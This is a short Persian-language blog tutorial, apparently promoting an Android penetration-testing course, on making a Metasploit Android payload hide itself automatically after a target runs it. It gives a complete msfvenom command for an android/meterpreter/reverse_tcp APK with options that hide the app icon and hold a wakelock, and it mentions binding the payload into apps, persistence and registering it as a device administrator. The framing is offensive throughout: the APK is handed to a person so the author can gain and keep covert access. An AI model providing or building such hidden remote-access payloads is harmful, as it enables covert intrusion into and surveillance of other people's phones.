حمید رضا محسنیان
برنامه نویس

مخفی سازی خودکار پیلود متاسپلویت برای اندروید

سلام خدمت دوستان عزیزم همه کسانی که  به هک و امنیت علاقه داشته باشند قطعا با متاسپلویت کار کردند و با اون آشنایی دارند و من هم فرض رو بر این میگیرم که شما با اون آشنا هستید و کار کردن با این فریم ورک رو بلدید.

دوره های شبکه، برنامه نویسی، مجازی سازی، امنیت، نفوذ و ... با برترین های ایران

اما امروز میخوام براتون یکی از ترفند های متاسپلویت موقع ساخت پیلود برای اندروید رو بگم.همه کسانی که فایل پیلود برای اندروید میسازند تا از تارگت خودشون دسترسی بگیرند کار های مختلفی رو انجام میدن مثل بایند کردن و پایدار کردن دسترسی و یا عضو کردن برنامه در سرپرست های دستگاه و ... اما اگر پیلودی رو که با متاسپلویت ساختیم به صورت معمول به فرد بدیم اتفاقی نمیفته یعنی نه برنامه مخفی میشه نه چیزی اجرا میشه ): ولی برنامه های رات مختلف رو دیدید که بعد از اجرای برنامه به صورت خودکار مخفی میشه اما سوال اینجاست که آیا میتوان با پیلودی که با متاسپلویت این کارو کرد ؟

جواب بله هست شما بعد دسترسی میتونید این کار رو بکنید اما شاید شما توی اون ساعت بیدار نباشید به نت دسترسی نداشته باشید یاهر مشکل دیگه ایی ما میخوایم کاری کنیم که بعد از اجرا برنامه به صورت خودکار این کار انجام بشه.

توجه کنید روش های مختلفی برای این کار وجود داره یعنی شما فایل ساخته شده رو هم میتونید این مخفی سازی رو روش اعمال کنید و از برنامه های آماده استفاده کنید اما امروز میخوایم با استفاده از msfvenom در موقع ساخت پیلود این کارو بکنیم.

روش کار ساده هست ما مثل حالت معمول که پیلود رو میسازیم عمل میکنیم.اما با یه تفاوت که چندین پارامتر به اون اضافه میکنیم و این نکته رو در نظر بگیرید که شخصی سازی های مختلف رو میتونید بعد ساخت انجام بدید.

msfvenom -p android/meterpreter/reverse_tcp LHOST=  "Your ip"    LPORT=  "Your Port"   AndroidHideAppIcon=true AndroidMeterpreterDebug=true AndroidWakelock=true -o tosinso.apk

دستورات مشخص هست و فکر نکنم نیاز به توضیح خاصی داشته باشه و ما با اضافه کردن این سه پارامتر میتونیم فرایند مخفی سازی بعد از اجرا رو به صورت خودکار کنیم.و اگر دوست داشتید میتونید مواردی مانند روشن نگه داشتن دستگاه رو بر دارید و بعدا برای پایدار کردن دسترسی ازش استفاد کنید.

جهت آشنایی ترفند های بیشتر و روش های دیگر دوره تست و نفوذ اندروید ما رو دنبال کنید.

 


نظرات